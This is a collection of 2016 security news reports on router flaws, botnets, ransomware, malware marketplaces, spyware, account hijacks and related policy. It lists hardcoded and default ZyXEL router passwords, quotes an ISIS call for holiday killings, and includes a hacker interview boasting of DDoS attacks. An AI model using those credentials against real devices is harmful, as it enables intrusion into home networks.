The third device, the P660HN-T v2 router is affected by a remote command injection vulnerability that results from an authenticated command injection chained with a hardcoded supervisor password. The flaw resides in the logSet.asp file, while the hardcoded supervisor credentials are username: supervisor; password: zyad1234.

“The actual command that can be injected has a length limitation of 28 characters.” states the advisory. “

Default accounts – P660HN-T v2 router

username: admin; password: password
username: true; password: true
username: supervisor; password: zyad1234″
The sad aspect of the story is that the researchers reported the vulnerabilities to ZyXEL in July, but the company still hasn’t issued any patched neither workaround.

Vulnerabilities in IoT devices, including home routers and SOHO devices, are particularly critic, because attackers can exploit them to compromise the equipment and recruit them in powerful “thingbot “such as the Mirai botnet.

The Leet Botnet powered a 650 Gbps DDoS attack before Christmas
29.12.2016 securityaffairs

Just before Christmas a massive DDoS attack powered by a new botnet dubbed Leet Botnet hit the network of the firm Imperva.
Security experts from the firm Imperva observed a massive attack against the company network on the morning of Dec. 21. The massive DDoS attack reached 650 Gbps, according to the researchers it was powered by the Leet Botnet and targeted several anycasted IPs on the Imperva Incapsula network.

Leet Botnet

The attack was launched once again by thousands of compromised IoT devices.

The attack didn’t target a specific customer of the company, likely because hackers were not being able to resolve the IP address of the victim that was hidden by the Incapsula mitigation proxies.

“It’s hard to say why this attack didn’t focus on a specific customer. Most likely, it was the result of the offender not being able to resolve the IP address of his actual victim, which was masked by Incapsula proxies.” reads the analysis published by Imperva.

Experts observed two distinct DDoS burst, the first one lasted 20 minutes and peaked at 400 Gbps, while the second burst lasted around 17 minutes and reached 650 Gbps.

“The first DDoS burst lasted roughly 20 minutes, peaking at 400 Gbps. Failing to make a dent, the offender regrouped and came back for a second round. This time enough botnet “muscle” to generate a 650 Gbps DDoS flood of more than 150 million packets per second (Mpps).” continues the analysis.

Both attacks failed. The experts were not able to track the real source of the attacks because hackers used spoofed IPs.

The analysis of the content of the packets composing the malicious traffic revealed that the attack was powered by Leet botnet, so called due to a ‘signature’ within the packets.

“The first thing we noticed was that the offender left a “signature” of sorts in some of the regular-sized SYN packets. In the TCP Options header of these packets, the values were arranged so they would spell “1337”. To the uninitiated, this is leetspeak for “leet”, or “elite”.” states Imperva.

Experts also noticed that the large content of the SYN payloads (799 to 936 bytes) that were populated by seemingly random strings of characters, others contained shredded lists of IP addresses.

“It seems that the malware we faced was programmed to access local files (e.g., access logs and iptable lists) and scramble their content to generate its payloads.”

Not only Mirai botnet, threat landscape as a new actor, the Leet botnet that can be equally dangerous.

Dreaded KillDisk Malware now includes Ransomware abilities
29.12.2016 securityaffairs

Researchers at security firm CyberX have recently discovered a variant of the KillDisk malware that also implements ransomware features.
KillDisk is a malware that has been used in attacks against industrial control systems (ICS), it was developed to wipe the hard drives of the infected machine in order to make it inoperable.

The new variant is able to encrypt the file with AES algorithm, the malware uses a unique key for each target and encrypt it with an RSA 1028 algorithm with a key stored in the body of the malware.

The variant of the KillDisk malware is able to encrypt a large number of files from both local partitions and network folders are targeted.

Victims are requested to pay 222 bitcoins ($206,000) to recover their files, a very exorbitant figure that suggests the intention of the author is to attack organizations with deep pockets.

The experts believe the variant has been developed by the TeleBots group, a Russian cybercriminal gang that developed its Telebots malware starting from the BlackEnergy one. The group was recently observed by experts from ESET targeting Ukrainian banks.

“This new variant of KillDisk was developed by the TeleBots gang, a group of Russian cybercriminals believed to have evolved from the Sandworm gang. The Sandworm gang is responsible for a string of attacks in the United States during 2014 that compromised industrial control system (ICS) and SCADA networks using a variant of the BlackEnergy malware” states the report published by the CyberX.

The researchers speculate the malware is being distributed via malicious Office attachments, a close look at the contact email used in the instructions reveals that hackers used the Tor anonymous email service lelantos.org.

The Bitcoin Wallet used by the hackers is still empty and there is no indication of past transactions.

KillDisk Malware

CyberX noticed that the same RSA public key is used for all samples of malware it analyzed, this implies that it could be used to decrypt files for all victims.

According to CyberX, the KillDisk malware first elevate its privileges and then registers itself as a service. The malicious code kills various processes, not critical system ones and processes associated with anti-malware applications, to avoid triggering detection.

Kaspersky discovered a One-stop-shop for hacking goods
29.12.2016 securityaffairs

Security experts from Kaspersky Lab discovered an interesting one-stop-shop for purchasing hacking goods while investigating activity of a popular RAT.
Security experts from Kaspersky Lab discovered an interesting one-stop-shop for purchasing hacking goods. The malware researchers were analyzing traffic from a number of infected machines that appear to be generated by the HawkEye RAT.

HawkEye is a popular RAT that can be used as a keylogger, it is also able to identify login events and record the destination, username, and password.

The domain was used as a C&C server of the HawkEye RAT and at the same time was also being used as a one-stop-shop for purchasing hacking goods.


Kaspersky discovered a group of WhiteHat hackers who call themselves Group Demóstenes who scans the Internet and looking to exfiltrate stolen data from Command and Control servers.

When the hackers find a server containing the stolen data they look for a backdoor that would give them access to the filesystem. In this way they monitor incoming stolen data, then they would collect the stolen credentials and send emails to the victims’ accounts, both manually or automatically.

The email send to the victims includes an attachment with proof that their machine has been hacked and the suggestion to change passwords and offer to help.

Hi ***********
Our SERVERS detected information from a server on the US, we don’t even know goverment or another sourse …. we send a file with all your logins and passwords of all your accounts from hxxp://www.p******op[.]biz/*******
Seme you verify this information. it’s better thing we hurt all change password on the other computer Because Called Computer

Local Time: 03.10.2016. 18:45:02
Installed Language: en-
Net Version: 2.0.50727.5485
Operating System Platform: Win32NT
Operating System Version: 6.1.7601.65536
Operating System: Microsoft Windows 7 Home Premium
Internal IP Address:
External IP Address:
Installed Anti virus: Avast Antivirus
Installed Firewall:

have a keylogger harm report All That You write, messages, passwords or more.

¿Why we do it?
We have a Cause Called Group Demóstenes looking for Ciber attacks and false info.
Please Donate by PayPal at h**cg**an@gmail[.]com 5 USD or more, Because this is only our ingress.


Back to the one-stop-shop discovered by Kaspersky, the experts discovered it is composed of a back-end for storing stolen credentials and a front-end for selling some of them, alongside many other hacking “goods”.

“To purchase goods in the private shop you must deposit money into your account on the website. The attackers accept Bitcoins, PerfectMoney and WebMoney.” states the analysis published by Kaspersky.

The shop allows users to register an account in order to make purchases. Kaspersky discovered the C&C was affected by a crucial vulnerability which allowed researchers to download the stolen data.


Among the items offered for sale, there are scam pages specifically designed to target Amazon, Apple, Netflix and even National Bank of Australia and Barclays.

The shop also includes information regarding the support to receive while using scam services.

The researchers discovered stolen credentials for sensitive applications across multiple industries, including government, healthcare, banking and payment web applications.

“Among them is the following web server which belongs to the Pakistani government.” states the report. “As mentioned, hundreds of machines were found to be compromised by just one C2.”

Researchers from Kaspersky obtained the attackers’ credentials from one very small file that was discovered on the server.

The analysis of affected users revealed they are mostly located in APAC (i.e. Japan, Thailand, and India) and Eastern Europe (i.e. Russia and Ukraine).

Police Ask for Amazon Echo Data to Help Solve a Murder Case
28.12.2016 thehackernews Security

Police seek Amazon Echo Data to solve a Murder Case
Hey, Alexa! Who did this murder?
Arkansas police are seeking help from e-commerce giant Amazon for data that may have been recorded on its Echo device belonging to a suspect in a murder case, bringing the conflict into the realm of the Internet of Things.
Amazon Echo is a voice-activated smart home speaker capable of controlling several smart devices by integrating it with a variety of home automation hubs. It can do tasks like play music, make to-do lists, set alarms, and also provide real-time information such as weather and traffic.

As first reported by The Information, authorities in Bentonville have issued a warrant for Amazon to hand over audio or records from an Echo device belonging to James Andrew Bates in the hope that they'll aid in uncovering additional details about the murder of Victor Collins.
Just like Apple refused the FBI to help them unlock iPhone belonging to one of the San Bernardino terrorists, Amazon also declined to give police any of the information that the Echo logged on its servers.
Collins died on November 21 last year while visiting the house of Bates, his friend from work, in Bentonville, Arkansas. The next morning, Collins' dead body was discovered in a hot tub, and Bates was charged with first-degree murder.
As part of the investigation, authorities seized an Amazon Echo device belonging to Bates, among other internet-connected devices in his home, including a water meter, a Nest thermostat, and a Honeywell alarm system.
Always-ON Listening Feature
Echo typically sits in an idle state with its microphones constantly listening for the "wake" command like "Alexa" or "Amazon" before it begins recording and sending data to Amazon's servers.

However, due to its always-on feature, it's usual for the Echo to activate by mistake and grab snippets of audio that users may not have known was being recorded.
Some of those voice commands are not stored locally on Echo but are instead logged onto Amazon's servers.
Presumably, the authorities believe that those audio records that the Echo device might have picked up the night of the incident and uploaded to Amazon servers could contain evidence related to the case under investigation.
Amazon Refused (Twice) to Hand over its User's Data
Amazon, however, denied providing any data that the authorities need. Here's what a spokesperson for the company told CNBC:
"Amazon will not release customer information without a valid and binding legal demand properly served on us. Amazon objects to overbroad or otherwise inappropriate demands as a matter of course."
While the online retail giant has twice refused to serve police the Echo data logged on its servers, Amazon did provide Bates' account information and purchase history.
The police said they were able to extract data from Echo, though it's uncertain what they were able to uncover and how useful that data would be in their investigation.
According to court records, Bates' smart water meter shows that his home ran 140 gallons of water between 1 AM and 3 AM the night Collins was found dead in Bates' hot tub. The prosecution claims that the water was used to wash away evidence after he killed Collins.
Should Amazon Share the Data or Not?
The authorities in the Collins murder case are asking for data on Amazon's servers that could help bring a criminal to justice. If so, authorities should get access to it.
In the case of Apple vs. FBI, Apple was forced to write a backdoor software that could bypass the security mechanism built into its iPhone, while the company already handed over the data stored on its server.
The broader takeaway: IoT devices automating your habits at home could be used for or against you, legally.
The Collins murder case appears to be a first-of-its-kind, and we are very much sure to see more such cases in the future.
It will be interesting to see how the companies that make smart home devices would serve its customers while maintaining a balance between keeping their customers' privacy safe and aiding the process of justice.

Did You Install Super Mario Run APK for Android? That's Malware
28.12.2016 thehackernews Android

After the success of Pokémon Go, Nintendo's "Super Mario Run" has become the hottest game to hit the market with enormous popularity and massive social impact. The game has taken the world by storm since its launch for iOS devices over a week ago.
Can you believe — it was downloaded more than 40 million times worldwide in its first four days of release.
But if you have downloaded a Super Mario Run APK for your Android device, Beware! That's definitely a malware.
Since Super Mario Run has currently been released only for iOS devices and is not on Google Play, it caused a lot of disappointment among Android users.

So, eventually, many Android device owners who love Mario games and can not wait to play Super Mario Run ended up downloading APKs outside of the Google Play Store.
But those tons of phony copycat unofficial Super Mario apps on many third-party Android app stores turn out to be malware or viruses that attempt to look like the legitimate Super Mario Run app.
Super Mario can Take Full Control of your Android Device
To download the third party APK, users are required to "side-load" the malicious app by modifying their Android core security settings, allowing their device's operating system to install apps from "untrusted sources."
Some of these malicious apps can even take full control of your Android device, as the apps request privileges to edit, read, receive and send text messages, take photos and record videos and track your location using GPS.
However, one of the apps titled "Super Mario" creates additional icons, displays pop-up and banner ads, installs other malicious apps onto victim's smartphone, and performs other intrusive activities without any users interaction, according to Tokyo-based Trend Micro antivirus firm, which detected malicious Super Mario apps 90,000 times this year.
"Clicking on these ads or icons will direct users to either adult sites or malicious sites. In either case, the goal is to get users to install various apps," researchers at Trend Micro writes.

"While some of these apps are perfectly legitimate, some are suspicious apps distributed by third-party app stores, including more malicious apps that even request for administrator rights."
Another app, also titled "Super Mario" and discovered by the security firm, prompts users first to install an app called 9Apps, which then asks for more permissions, including recording audio, reading modifying the calendar and even access to complete SD-card.
Here's How to Prevent Yourself
So, instead of downloading applications from unknown third party stores, Android users are required to wait for the official Google Play release.
Downloading apps from third parties do not always end up with malware or viruses, but it certainly ups the risk. So, it's the best way to wait to avoid compromising your device and the networks it accesses.
You can also go to Settings → Security and make sure "Unknown sources" option is turned off.

The number of ICS Attacks continues to increase worldwide
28.12.2016 securityaffairs

According to data provided by IBM Managed Security Services, the number of ICS attacks in 2016 continues to increase worldwide.
Industrial control systems (ICS) continues to be a privileged target of hackers. According to IBM Managed Security Services, the number of cyber attacks increased by 110 percent in 2016 compared to 2015.

According to the researchers from IBM, the spike is associated with a significant increase to brute force attacks on supervisory control and data acquisition (SCADA) systems.

ICS attacks 2016

IBM notices an increase in ICS traffic caused by SCADA brute-force attacks, unfortunately in some cases systems are exposed on the Internet with default credentials or weak passwords.

IBM warns of the availability of a penetration testing framework named smod that was used in a large number of attacks. The tool was published on the GitHub repository in January 2016, it allows to assess the Modbus serial communications protocol. It could also be used by attackers to power brute-force attacks.

“In January 2016, GitHub released a penetration testing solution that contained a brute-force tool that can be used against Modbus, a serial communication protocol. The public release and subsequent use of this tool by various unknown actors likely led to the rise in malicious activity against ICS in the past 12 months.” states the blog post published by IBM Managed Security Services.

The analysis of the sources of the attacks revealed that threat actors in the US accounted for the majority of ICS attacks in 2016 (60%), followed by Pakistan (20%), and China (12%). The United States also topped the list of the top 5 destination countries, this data is considered normal by experts because the US has the largest number of internet-connected ICS systems in the world.

The report mentions the following three notable ICS attacks occurred in the last years.

The 2013 New York dam attack. Iranian hackers penetrated the industrial control system of a dam near New York City in 2013, raising concerns about the security of US critical infrastructure.
The 2015 Ukrainian power outage. Experts speculated the involvement of the Russian Government. According to security experts, the BlackEnergy malware was a key element of the attack against Ukrainian power grid that caused the power outage.
The 2016 SFG malware attacks. The Labs team at SentinelOne recently discovered a sophisticated malware dubbed Furtim specifically targeting at least one European energy company.
The report warns organization in any industry of cyber attacks against ICS system and urges the adoption of necessary countermeasures.

“Organizations across all verticals must take full responsibility for protecting their own assets and consumers. There should be no exceptions, since the best way to keep adversaries out of an ICS is to implement simple safeguards, best practices and risk management solutions.” states the report.

ISIS use of Telegram has definitively surpassed Twitter
28.12.2016 securityaffairs Cyber

Telegram is the ‘app of choice’ for ISIS members, its use has definitively surpassed Twitter and other social media platforms.
Do you want to investigate ISIS activities, you have to be aware that Telegram is today its privileged channel for propaganda.

The use of the popular encrypted messaging app is widespread among the militants of the terrorist organization, The use of Telegram has eclipsed the use of other social media platforms, including Twitter.

Social media continue to ban the content posted by members of the ISIS in the attempt to block their propaganda online.

Twitter continues to close hundreds of thousands of accounts for violating the company’s policies on violent extremism. In August Twitter published a blog post that revealed it has shut down 360,000 terrorist-related accounts since last year.

“Earlier this year, we announced we had suspended more than 125,000 accounts since mid-2015 for violating our longtime prohibition on violent threats and the promotion of terrorism and shared the steps we are taking as a company to combat this content.” states the post. “While our work is not done, today we are announcing that we have suspended an additional 235,000 accounts for violating our policies related to promotion of terrorism in the six months since our February 2016 post.”

In the weeks before the tragic the tragic Berlin attack, intelligence analysts observed many IS known Telegram channels sharing messages, calling for volunteers for a holiday killing spree.

“Christmas, Hanukkah, and New Years Day is very soon,” states one of the messages cited by the Washington Post. “So let’s prepare a gift for the filthy pigs/apes.”

The reason for the widespread use of Telegram is related to the lack repressive measures of the company against ISIS activities through its application.

“[Telegram is] the app of choice for many Isis, pro-Isis and other jihadi and terrorist elements.” states a report published by the Middle East Media Research Institute (MEMRI).

A previous report published by the MEMRI JTTM, titled “Jihadis Shift To Using Secure Communication App Telegram’s Channels Service” published October 29, 2015, noted that numerous jihadis and jihadi organizations had opened their own channels on Telegram.

ISIS and Al-Qaeda in the Arabian Peninsula (AQAP) opened several channels to allow secure communications among its members.

Telegram ISIS Channel

Nasher is the most popular multi-language set of channels of ISIS-related news on Telegram.

“Based on the rate at which new jihadi channels are emerging, and on the large number of members they are attracting, these channels can be expected to become a fertile and secure arena for jihad-related activities.” This has indeed come to pass.” states the report.

According to the researchers, Telegram has surpassed Twitter as the most important platform of communication.

“It has surpassed Twitter as the most important platform,” said Steven Stalinsky, lead author of the report. “All the big groups are on it. We see Isis talking about the benefits of Telegram and encouraging its followers to use it.”

Telegram is easy to use and offers a number of different options for regular and encrypted communications.

“The West has been generally two steps behind the jihadis when it comes to cyber,” expalined said Steven Stalinsky, lead author at the MEMRI. “Many people in government are still focused on Twitter, and they need to be. But what we tell them is, ‘That’s no longer the main story.’ “

Once again the IS demonstrates the ability of its members in chenging tactics and means to make harder the monitoring of their activities, but at the same time maximizing the benefics in using technology.

Lithuania government PCs infected by a Russian spyware
28.12.2016 securityaffairs

Lithuania said found Russian spyware on its government computers, the government blames Moscow for cyber espionage campaigns.
Lithuania blames the Russia for cyber attacks that have hit government networks over the last two years. According to the Reuters, the head of cyber security Rimtautas Cerniauskas confirmed the discovery of at least three Russian spyware on government computers since 2015.

Lithuanian officials targeted by the alleged Russian spyware held mid-to-low ranking positions at the government, anyway Cerniauskas confirmed their PCs contained government sensitive documents.

“The head of cyber security told Reuters three cases of Russian spyware on its government computers had been discovered since 2015, and there had been 20 attempts to infect them this year.” states the article published by the Reuters.

“The spyware we found was operating for at least half a year before it was detected – similar to how it was in the USA,” said Rimtautas Cerniauskas.

Lithuania cyber espionage

The Government of Moscow denies the involvement in the attacks, spokesman Dmitry Peskov told Reuters the accusations were “laughable” and unsubstantiated. Russian authorities explained that also their networks are targeted by hackers, but Moscow has never accused other governments.

“Did it (the spyware) have ‘Made in Russia’ written on it?” quipped Peskov. “We absolutely refute this nonsense.”

Almost any government fears Russian nation-state actors, the cyber attacks against US Presidential Election and the string of incidents occurred in Ukraine raised the fears of Russian cyber attacks.

According to the German Intelligence, the APT 28 group, also known as Fancy Bear, is ramping up information warfare against Germany and the rest of West to destabilize foreign Governments.

“Lithuania, Estonia and Latvia, all ruled by Moscow in communist times, have been alarmed by Russia’s annexation of Ukraine’s Crimea peninsula in 2014 and its support for pro-Russian separatists in eastern Ukraine.” continues the Reuters.

According to the Lithuanian intelligence services, the cyber attacks were politically motivated and threat actors conducted cyber espionage activities on state institutions.

The Russian spyware was used by hackers to exfiltrate documents, as well as collect login credentials from popular web services such as Gmail and Facebook. Syphoned data were sent to an IP address linked to cyber espionage campaigns conducted by Russian cyber spies.

“This only confirms that attempts are made to infiltrate our political sphere,” said Cerniaukas.

“Russians are really quite good in this area. They have been using information warfare since the old times. Cyberspace is part of that, only more frowned upon by law than simple propaganda”, he added.

“They have capacity, they have the attitude, they are interested, and they will get to it – so we need to prepare for it and we need to apply countermeasures.”

This isn’t the first time that Russian hackers target Lithuanian systems, According to the head of the Lithuanian counter-intelligence agency Darius Jauniskis, in 2012 Moscow launched coordinated attacks against the Lithuanian central bank and top online news website.

“It is all part of psychological warfare,” explained Darius.

Hacked Sony Music Entertainment account tweeted about Britney Spears’s Death
27.12.2016 securityaffairs Hacking

Hackers compromised the Sony Music Entertainment Twitter account and posted the messages on Britney Spears’s Death. Experts blame OurMine crew.
Sony Music Entertainment’s Twitter account was compromised and hackers posted the news of the Britney Spears’s death.

“RIP @britneyspears #RIPBritney 1981-2016” and “Britney spears is dead by accident! We will tell you more soon #RIPBritney.” states the messages posted by the hackers.

Hacked Sony Music Entertainment account

Sony Music Entertainment quickly deleted the messages and confirmed the hack of its account.

“Sony Music Entertainment’s Twitter account was compromised. This has been rectified,” it said.

“Sony Music apologizes to Britney Spears and her fans for any confusion.”

Separately, the official Twitter account for Bob Dylan featured a tweet that read:

“Rest in peace @britneyspears,” but the message was later deleted.

Adam Leber, a spokesman for the pop star told CNN the news was fake.

“I assume their account has been hacked,” said Spears’ manager, Adam Leber.”I haven’t spoken to anyone… as of yet but I am certain their account was hacked. Britney is fine and well. There have been a few Internet clowns over the years who have made similar claims about her death, but never from the official Sony Music Twitter account.” said the spokesman.

Who is behind the hack?

Security experts suspect the account was hacked by the notorious hacker group OurMine, the same that recently hacked the NetFlix account and the accounts belonging to many Very Important People.

OurMine is a very popular hacker group that hacked multiple high-profile accounts including Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.

The group uses to hack the accounts to demonstrate the poor security, then it offers its consultancy to prevent future attacks.

Two Tweets posted by the hacked Sony Music Entertainment’s Twitter account suggest the involvement of the OurMine Team:

“We detected unusual activity on the account and we checked the account if it’s hacked or not”, states one Tweet, followed by, “we saw a new IP logged in to the account a few minutes ago and the tweet is posted by a new IP so @britneyspears is still alive #OurMine”.

Hacked Sony Music Entertainment account

Hacked Sony Music Entertainment account

This isn’t the first time hackers target Sony, in November 2014 the hacking group known as GOP broke into the company systems and stole sensitive information, including employees data.

The FBI blamed the North Korea for the cyber attack.

Critical PHPMailer Flaw leaves Millions of Websites Vulnerable to Remote Exploit
26.12.2016 thehackernews 
A critical vulnerability has been discovered in PHPMailer, which is one of the most popular open source PHP libraries to send emails used by more than 9 Million users worldwide.
Millions of PHP websites and popular open source web applications, including WordPress, Drupal, 1CRM, SugarCRM, Yii, and Joomla comes with PHPMailer library for sending emails using a variety of methods, including SMTP to their users.

Discovered by Polish security researcher Dawid Golunski of Legal Hackers, the critical vulnerability (CVE-2016-10033) allows an attacker to remotely execute arbitrary code in the context of the web server and compromise the target web application.
"To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class," Golunski writes in the advisory published today.
Golunski responsibly reported the vulnerability to the developers, who have patched the vulnerability in their new release, All versions of PHPMailer before the critical release of PHPMailer 5.2.18 are affected, so web administrators and developers are strongly recommended to update to the patched release.

Since The Hacker News is making the first public disclosure of the vulnerability in the news following Golunski advisory and millions of websites remain unpatched, the researcher has put on hold more technical details about the flaw.
However, Golunski has promised to release more technical details about the vulnerability in coming days, including a proof-of-concept exploit code and video demonstration that will show the attack in action.
We will update this article with additional information on the PHPMailer vulnerability, exploit code and video demonstration, once the researcher makes it public.

Cyanogen is shutting down CyanogenMod, it will go on as Lineage, maybe
26.12.2016 securityaffairs OS

The most popular custom Android ROM, the Cyanogen OS, Announced That it is closing its services starting from December 31, 2016.
Bad news for users of the most popular custom Android ROM, the Cyanogen OS, that is now closing its services.

Cyanogen was launched with the intent to provide an improved version of the Google Android operating system but following some technical and potential legal issues, it decided to shut down its custom services.

CyanogenMod OS is not a commercial operating system that implements features not available in the official firmware distributed by mobile device vendors.

It is managed by a community of developers led by Steve Kondik, which is one of the co-founder of Cyanogen.

“As part of the ongoing consolidation of Cyanogen, all services and Cyanogen-supported nightly builds will be discontinued no later than 12/31/16. The open source project and source code will remain available for anyone who wants to build CyanogenMod personally.” reads an official statement published on the official website.

The planned shutdown of Cyanogen was officially announced late Friday through a very brief blog post made by the company, saying “as part of the ongoing consolidation of Cyanogen,” it’s shutting down all services and nightly builds on December 31.

What does it mean for end-users?

Starting from January 2017, there will be no more Android ROM updates, anyway, the open source project and source code will remain available for those people that want to build their own CyanogenMod.

Cyanogen will stop providing nightly builds and security updates for its OS, mobile devices running Cyanogen OS (i.e. OnePlus One), will have to switch to the open-source version of the CyanogenMod OS.

At the time I was writing the www.cyanogenmod.org is down.

The CyanogenMod team has published a post to confirm the shutdown of the CM infrastructure and revealing a plan to continue the open-source initiative as Lineage.

Below the full message from the team:

“Last week, we released the final CM-13.0 releases, updated to the latest security patches, in anticipation of what follows.

Yesterday, Cyanogen Inc (Cyngn) announced that they were shutting down the infrastructure behind CyanogenMod (CM). This is an action that was not unpredictable given the public departure of Kondik (cyanogen himself) from the company, and with him our last remaining advocate inside Cyngn’s leadership.

In addition to infrastructure being retired, we in the CM community have lost our voice in the future direction of CM – the brand could be sold to a third party entity as it was an asset that Kondik risked to start his business and dream. Even if we were to regroup and rebuild our own infrastructure, continuing development of CM would mean to operate with the threat of sale of the brand looming over our heads. Then there is the stigma that has grown to be attached to anything named ‘Cyanogen’. Many of you reading this have been champions of clarifying that the CM product and CyngnOS were distinct, yet the stain of many PR actions from Cyngn is a hard one to remove from CM. Given CM’s reliance on Cyngn for monetary support and the shared source base, it’s not hard to understand why the confusion remains.

It will come as no surprise that this most recent action from Cyngn is definitely a death blow for CyanogenMod.

However, CM has always been more than the name and more than the infrastructure. CM has been a success based on the spirit, ingenuity and effort of its individual contributors – back when it was Kondik in his home, to the now thousands of contributors past and present.

Embracing that spirit, we the community of developers, designers, device maintainers and translators have taken the steps necessary to produce a fork of the CM source code and pending patches. This is more than just a ‘rebrand’. This fork will return to the grassroots community effort that used to define CM while maintaining the professional quality and reliability you have come to expect more recently.

CM has served the community well over its 8 long years. It has been our home, bringing together friends from all over the world to celebrate our joy of building and giving. Its apt then that on this Eve of a holiday we pay our respects. We will take pride in our Lineage as we move forward and continue to build on its legacy.

Thank you & Goodbye,
The CyanogenMod Team”

Cyanogen shut down

The CyanogenMod community is now working to produce a fork of the CyanogenMod source code and pending patches.

Android community believes that a new project, dubbed LineageOS, will bo continue to live on it, but it is still in its infancy.

According to the CyanogenMod (CM) team, Lineage “is more than just a ‘rebrand’” and “will return to the grassroots community effort that used to define CM while maintaining the professional quality and reliability you have come to expect more recently.”

If you are interested in LineageOS you can give a look at its website, the files of the Lineage Android Distribution can be found on a repository on GitHub.

“So, yes, this is us. LineageOS will be a continuation of what CyanogenMod was. To quote Andy Rubin, this is the definition of open. A company pulling their support out of an open source project does not mean it has to die.” states the description about

Obama moves to end dual-hat arrangement separating Cybercom from NSA
26.12.2016 securityaffairs Cyber

President Obama urges to the end the dual-hat arrangement to separate the heads of the U.S. Cyber Command from National Security Agency.
Cyber security is one of the most important topics on the agenda of any Government and it will be one of the most debated arguments at the next G7 summit that will be held in Italy next year.

I’m currently working with the Cyber G7 Group and I have the opportunity to analyze the approach to the matter of various states and to promote new initiatives aiming to harmonize the cyber-security approach “of governments” by encouraging the cooperation and avoiding situations of conflict.

Last week, President Obama moved to end the controversial dual-hat arrangement under which the National Security Agency and the U.S. Cyber Command (Cybercom) are headed by the same military officer.

The decision is really important and highlights the strategic importance of the mission assigned to the U.S. Cyber Command. According to a transition official quoted by the Washington Post who spoke on the condition of anonymity, cybersecurity is one of the most important issues in the US Security Strategy.

“cybersecurity has been and will be a central focus of the transition effort.” said the official.

Obama moves to end dual-hat arrangement separating Cybercom from NSA

The NSA and the U.S. Cyber Command have fundamentally different missions, for this reason, it is essential to separate their control.

Let’s remind that the mission of the U.S. Cyber Command is to disrupt and destroy enemies infrastructures and to defend the US against incoming cyber threats.

The documents leaked by Snowden clarify the mission of the NSA that is more focused on intelligence operations on adversaries and foreign governments.

U.S. Cyber Command has grown over time, its mission has become even clearer with increasing awareness of the cyber threat. Since the Stuxnet against the Natanz nuclear plant, something has changed permanently and dual-hat arrangement is considered no more effective for the US cyber strategy.

“While the dual-hat arrangement was once appropriate in order to enable a fledgling Cybercom to leverage NSA’s advanced capabilities and expertise, Cybercom has since matured.” to the point where it needs its own leader, Obama said in a statement accompanying his signing of the 2017 defense authorization bill.

Obama believes that the Cybercom urges its own leader, he confirmed it in a statement accompanying his signing of the 2017 defense authorization bill.

“The two organizations should have separate leaders who are able to devote themselves to each organization’s respective mission and responsibilities, but should continue to leverage the shared capabilities and synergies developed under the dual-hat arrangement,” Obama wrote about the dual-hat arrangement.

The Obama decision to separate the heads of the two organizations was supported by the Defense Secretary Ashton B. Carter and Director of National Intelligence James R. Clapper Jr.,

The idea of separating the heads of the two organizations is not new, President Obama proposed it back in 2013.

“Obama had been on the verge of ending the dual-hat leadership in late 2013 but was persuaded to hold off when senior officials, including the NSA’s director at the time, Army Gen. Keith B. Alexander, argued that the two agencies needed one leader to ensure that the NSA did not withhold resources from Cybercom.” wrote The Washington Post.

A presidential review commission the end of the dual-hat arrangement and suggest the assignment of the NSA direction to a civilian and not to a military official.

The bill that Obama signed bars the splitting of the leadership role until the defense secretary and the chairman of the Joint Chiefs of Staff jointly certify that to do so would not diminish Cybercom’s effectiveness.

“The Congress . . . should not place unnecessary and bureaucratic administrative burdens and conditions on ending the dual-hat arrangement at a time when the speed and nature of cyber threats requires agility in making decisions about how best to organize and manage the nation’s cyber capabilities,” added Obama.

The transition will not be instantaneous, the Pentagon and the Office of the Director of National Intelligence have planned a period during which the NSA can continue to “provide vital operational support” to Cybercom.

Cyanogen Shutting Down All Services; No More Android ROM Updates
26.12.2016 thehackernews  OS
A bittersweet Christmas and New Year for users and fans of the most popular custom Android ROM, Cyanogen OS.
Cyanogen that tried and failed to kill Google's Android operating system is now shutting down the custom services that it provides to phones that run its Cyanogen OS as we know it and the "nightly builds" of said OS on December 31st.
Cyanogen came with an ambition to build better versions of the Android operating system than those created by Google itself, but following some technical and potential legal issues, the startup has decided to quit.

The planned shutdown of Cyanogen was officially announced late Friday through a very brief blog post made by the company, saying "as part of the ongoing consolidation of Cyanogen," it's shutting down all services and nightly builds on December 31.
"The open source project and source code will remain available for anyone who wants to build CyanogenMod personally," the blog reads.
What About Cyanogen OS-Powered Smartphones?
From January 2017, there will be no further updates to the Cyanogen OS, no more nightly builds, and no more security updates.
Eventually, smartphones running on the Cyanogen OS, like the original OnePlus One and Lenovo ZUK Z1, will have to switch to the open-source version of the CyanogenMod operating system.

CyanogenMod OS is not a commercial operating system and is managed by a community of developers led by Steve Kondik, the co-founder of Cyanogen.
'Death Blow' to CyanogenMod
However, the CyanogenMod team believes that the shutdown of Cyanogen is a "death blow" to CyanogenMod, the team announced just after the closure announcement by Cyanogen.
CyanogenMod team pays respects to the community as it served for more than eight long years and announced the next open-source Android project.
Embracing the spirit of Cyanogen, the CyanogenMod team of developers, designers, device maintainers, and translators are now working to produce a fork of the CyanogenMod source code and pending patches.
Next? CyanogenMod Team Launches Lineage OS
While both Cyanogen and CyanogenMod are saying goodbye this year, the spirit of CyanogenMod will continue to live on in the new open source project.
Dubbed LineageOS, the new OS is still in its inception phase and would take some time for people to see any progress from the newly formed unit.
According to the CyanogenMod (CM) team, Lineage "is more than just a ‘rebrand’" and "will return to the grassroots community effort that used to define CM while maintaining the professional quality and reliability you have come to expect more recently."
A website is being developed for LineageOS, and the GitHub repository can be found populated with CM files, called Lineage Android Distribution. The beginning of this new open source project "will be a continuation of what CyanogenMod was."

Hacker Interviews – R.I.U. crip (@cripthepoodle) – Security Affairs
26.12.2016 securityaffairs 

@cripthepoodle is one of the members of the dreaded PoodleCorp hacker crew recently he targeted Steam platform, let’s meet him.

You are a talented hacker that is very active online, could you tell me more about you. Could you tell me which his your technical background and when you started hacking?

I started to get into coding java in 2010 then met people on Xbox who enjoyed stuff I liked to do those people are Jordie and Kyle

Which are your motivations?

My motivation is just to cause chaos for fun and make some money

What was your greatest hacking challenge? Which was your latest hack? Can you describe me it?

I never really had a challenge except when I first started and I helped para and anti attempt to get root on .mil which went horribly wrong rofl which wasn’t my fault btw.

My lasted attack was on Steam at approximately 10:40 am December 23rd and I did the attack by being behind iptables on a Linux VPS and dropping all UDP packets, those packets are going to hit the servers then boom it’s offline

